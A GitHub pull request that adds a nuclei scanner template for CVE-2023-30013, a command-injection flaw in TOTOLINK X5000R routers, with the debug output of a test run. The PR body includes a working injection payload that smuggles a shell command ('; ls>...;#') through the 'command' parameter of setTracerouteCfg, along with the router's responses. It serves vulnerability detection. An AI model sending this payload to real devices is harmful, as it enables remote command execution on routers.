Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create CVE-2023-30013.yaml #8293

Merged
merged 2 commits into from
Oct 10, 2023
Merged

Create CVE-2023-30013.yaml #8293

merged 2 commits into from
Oct 10, 2023

Conversation

gy741
Copy link
Contributor

@gy741 gy741 commented Sep 30, 2023

Template / PR Information

Hello,

Added CVE-2023-30013

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Template Validation

I've validated this template locally?

  • YES
  • NO

image

image

image

$ nuclei -t CVE-2023-30013.yaml -u http://192.168.0.1 --debug

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"command":"127.0.0.1; ls>../2W7n8eYnm8kR6cuEzZkIWLLfoQS;#","num":"230","topicurl":"setTracerouteCfg"}
[DBG] [CVE-2023-30013] Dumped HTTP response http://192.168.0.1/cgi-bin/cstecgi.cgi

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Date: Wed, 30 Sep 2015 16:45:26 GMT
Server: lighttpd/1.4.20

traceroute to 127.0.0.1 (127.0.0.1), 230 hops max, 38 byte packets
 1  localhost.localdomain (127.0.0.1)  2.265 ms  0.166 ms  0.678 ms
{
        "success":      true,
        "error":        null,
        "lan_ip":       "192.168.0.1",
        "wtime":        "0",
        "reserv":       "reserv"
}
[INF] [CVE-2023-30013] Dumped HTTP request for http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

GET /2W7n8eYnm8kR6cuEzZkIWLLfoQS HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2023-30013] Dumped HTTP response http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

HTTP/1.1 200 OK
Connection: close
Content-Length: 41
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Wed, 30 Sep 2015 16:45:26 GMT
Etag: "878264423"
Last-Modified: Wed, 30 Sep 2015 16:45:26 GMT
Server: lighttpd/1.4.20


00000000  45 78 70 6f 72 74 53 65  74 74 69 6e 67 73 2e 73  |ExportSettings.s|
00000010  68 0a 63 73 74 65 63 67  69 2e 63 67 69 0a 63 75  |h.cstecgi.cgi.cu|
00000020  73 74 6f 6d 2e 63 67 69  0a                       |stom.cgi.|
[CVE-2023-30013:word-1] [http] [critical] http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS
[CVE-2023-30013:status-2] [http] [critical] http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

@gy741
Create CVE-2023-30013.yaml
208ff38 
TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Signed-off-by: GwanYeong Kim <[email protected]>
@pussycat0x pussycat0x self-assigned this Oct 1, 2023
@pussycat0x pussycat0x added the Done Ready to merge label Oct 10, 2023
@DhiyaneshGeek DhiyaneshGeek merged commit 9db41d5 into projectdiscovery:main Oct 10, 2023
2 checks passed
@DhiyaneshGeek
Copy link
Member

Hi @gy741 Thank you so much for sharing this template with the community

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@DhiyaneshGeek DhiyaneshGeek DhiyaneshGeek approved these changes

Assignees

@pussycat0x pussycat0x

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@gy741 @DhiyaneshGeek @pussycat0x